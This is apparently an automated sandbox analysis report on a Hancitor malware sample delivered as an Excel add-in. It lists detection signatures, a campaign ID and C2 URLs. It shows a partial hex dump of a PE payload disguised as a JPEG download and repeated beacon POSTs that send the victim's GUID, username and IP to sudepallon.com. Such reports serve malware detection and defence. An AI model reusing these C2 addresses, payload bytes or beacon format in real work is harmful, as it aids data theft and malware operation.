Windows Analysis Report 0708_5355150121.xll

Overview

General Information

Sample Name:	0708_5355150121.xll
Analysis ID:	445958
MD5:	41e0318dfdb1c180a375a7efc712649e
SHA1:	f0c230010c7b85544c25879d4daf74479360e1bc
SHA256:	73b8c566d8cdf3200daa0b698b9d32a49b1ea8284a1e6aa6408eb9c9daaacb71
Tags:	dllxll
Infos:
Most interesting Screenshot:

Detection

Hancitor

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Hancitor

C2 URLs / IPs found in malware configuration

Contains functionality to inject threads in other processes

Document exploit detected (process start blacklist hit)

Downloads files with wrong headers with respect to MIME Content-Type

Drops PE files to the user root directory

May check the online IP address of the machine

Powershell drops PE file

Sigma detected: Execution from Suspicious Folder

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Mshta Spawning Windows Shell

Abnormal high CPU Usage

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmp

Malware Configuration Extractor: Hancitor {"Campaign Id": "0707in2_wvcr", "C2 list": ["http://sudepallon.com/8/forum.php", "http://anspossthrly.ru/8/forum.php", "http://thentabecon.ru/8/forum.php"]}

Multi AV Scanner detection for submitted file

Source: 0708_5355150121.xll	Virustotal: Detection: 23%			Perma Link
Source: 0708_5355150121.xll	ReversingLabs: Detection: 17%

Antivirus or Machine Learning detection for unpacked file

Source: 16.2.snd32sys.exe.610000.0.unpack

Avira: Label: TR/Dropper.Gen

Location Tracking:

Yara detected Hancitor

Source: Yara match	File source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: snd32sys.exe PID: 2160, type: MEMORY

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00612CB0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	16_2_00612CB0
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00612CF7 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	16_2_00612CF7
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00612D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	16_2_00612D78
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00612D58 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	16_2_00612D58
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00612D35 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	16_2_00612D35

Compliance:

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\snd32sys.exe

Unpacked PE file: 16.2.snd32sys.exe.610000.0.unpack

Uses 32bit PE files

Source: 0708_5355150121.xll

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED

Source:

Binary string: c:\HighNature\Straightbusy\conditionSurface\Jobhas\industryCountryfeel.pdb source: snd32sys.exe, snd32sys.exe.6.dr

Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0065838E FindFirstFileExW,FindNextFileW,FindClose,		16_2_0065838E
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00657FD2 FindFirstFileExW,		16_2_00657FD2

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\mshta.exe

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://sudepallon.com/8/forum.php
Source: Malware configuration extractor	URLs: http://anspossthrly.ru/8/forum.php
Source: Malware configuration extractor	URLs: http://thentabecon.ru/8/forum.php

Downloads files with wrong headers with respect to MIME Content-Type

Source: http

Image file has PE prefix: HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Jul 2021 14:30:58 GMT Content-Type: image/jpeg Content-Length: 763392 Connection: keep-alive Last-Modified: Wed, 07 Jul 2021 13:36:32 GMT ETag: "60e5ade0-ba600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 81 0c 63 f0 c5 6d 0d a3 c5 6d 0d a3 c5 6d 0d a3 18 92 c2 a3 c4 6d 0d a3 18 92 c0 a3 c6 6d 0d a3 18 92 c3 a3 d1 6d 0d a3 18 92 c6 a3 d3 6d 0d a3 c5 6d 0c a3 a1 6d 0d a3 18 92 df a3 c0 6d 0d a3 18 92 c4 a3 c4 6d 0d a3 18 92 c1 a3 c4 6d 0d a3 52 69 63 68 c5 6d 0d a3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a3 3c de 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 62 07 00 00 ce 0d 00 00 00 00 00 b0 ac 01 00 00 10 00 00 00 80 07 00 00 00 00 01 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 15 00 00 04 00 00 57 d6 0b 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 75 09 00 b4 00 00 00 00 80 13 00 40 93 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 15 00 40 47 00 00 70 39 09 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 39 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 60 07 00 00 10 00 00 00 62 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 04 02 00 00 80 07 00 00 06 02 00 00 66 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c4 ea 09 00 00 90 09 00 00 5e 00 00 00 6c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 93 01 00 00 80 13 00 00 94 01 00 00 ca 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 47 00 00 00 20 15 00 00 48 00 00 00 5e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

May check the online IP address of the machine

Source: C:\Users\Public\snd32sys.exe	DNS query: name: api.ipify.org
Source: C:\Users\Public\snd32sys.exe	DNS query: name: api.ipify.org
Source: C:\Users\Public\snd32sys.exe	DNS query: name: api.ipify.org

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 08 Jul 2021 14:30:58 GMTContent-Type: image/jpegContent-Length: 763392Connection: keep-aliveLast-Modified: Wed, 07 Jul 2021 13:36:32 GMTETag: "60e5ade0-ba600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 81 0c 63 f0 c5 6d 0d a3 c5 6d 0d a3 c5 6d 0d a3 18 92 c2 a3 c4 6d 0d a3 18 92 c0 a3 c6 6d 0d a3 18 92 c3 a3 d1 6d 0d a3 18 92 c6 a3 d3 6d 0d a3 c5 6d 0c a3 a1 6d 0d a3 18 92 df a3 c0 6d 0d a3 18 92 c4 a3 c4 6d 0d a3 18 92 c1 a3 c4 6d 0d a3 52 69 63 68 c5 6d 0d a3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a3 3c de 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 62 07 00 00 ce 0d 00 00 00 00 00 b0 ac 01 00 00 10 00 00 00 80 07 00 00 00 00 01 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 15 00 00 04 00 00 57 d6 0b 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 75 09 00 b4 00 00 00 00 80 13 00 40 93 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 15 00 40 47 00 00 70 39 09 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 39 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 60 07 00 00 10 00 00 00 62 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 04 02 00 00 80 07 00 00 06 02 00 00 66 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c4 ea 09 00 00 90 09 00 00 5e 00 00 00 6c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 93 01 00 00 80 13 00 00 94 01 00 00 ca 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 47 00 00 00 20 15 00 00 48 00 00 00 5e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /92375234.xml HTTP/1.1Connection: Keep-AliveHost: srand04rf.ru

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 23.21.173.155 23.21.173.155
Source: Joe Sandbox View	IP Address: 77.222.42.67 77.222.42.67

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: SWEB-ASRU SWEB-ASRU

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /08.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: srand04rf.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
